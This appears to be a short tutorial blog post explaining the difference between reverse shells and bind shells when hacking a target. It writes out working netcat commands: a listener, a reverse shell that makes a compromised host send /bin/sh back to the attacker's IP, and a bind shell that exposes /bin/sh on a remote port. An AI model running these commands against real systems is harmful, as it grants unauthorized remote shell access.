There are two types (perhaps more?) of shells that we attempt to establish when hacking a target: the reverse shell and the bind shell.
The reverse shell is the most common type of shell found in the wild. This type of shell goes like this:
- We open a port locally, such as
nc -lvp 4444
- We "pop" a remote host and get it to execute
nc $ourIP 4444 -e /bin/sh
This results in the remote system talking back to our port on
4444, giving us a shell on the remote system.
This type of shell is a "reverse" shell because the remote system is establishing the shell by talking to us. Normally you'd establish the connection from your local system, but the reverse shell literally reverses this logic.
Here's a dorky diagram I drew to illustrate the above.
The bind shell is almost like a traditional connection - the remote server offers a network service on a port and you connect to it. This is how SSH operates.
The primary difference between the two shell types is a reverse shell connects back to us, which requires our networking infrastructure to let the connection in. The bind shell opens or "binds" to a port remotely that we then connect to.
A bind shell goes like this:
- We pop a remote shell and start a remote shell, binding to a port:
nc -lvp 4444 -e /bin/sh
- We connect to the remote shell (
nc $remoteIP 4444) and then take advantage of the access to elevate our privileges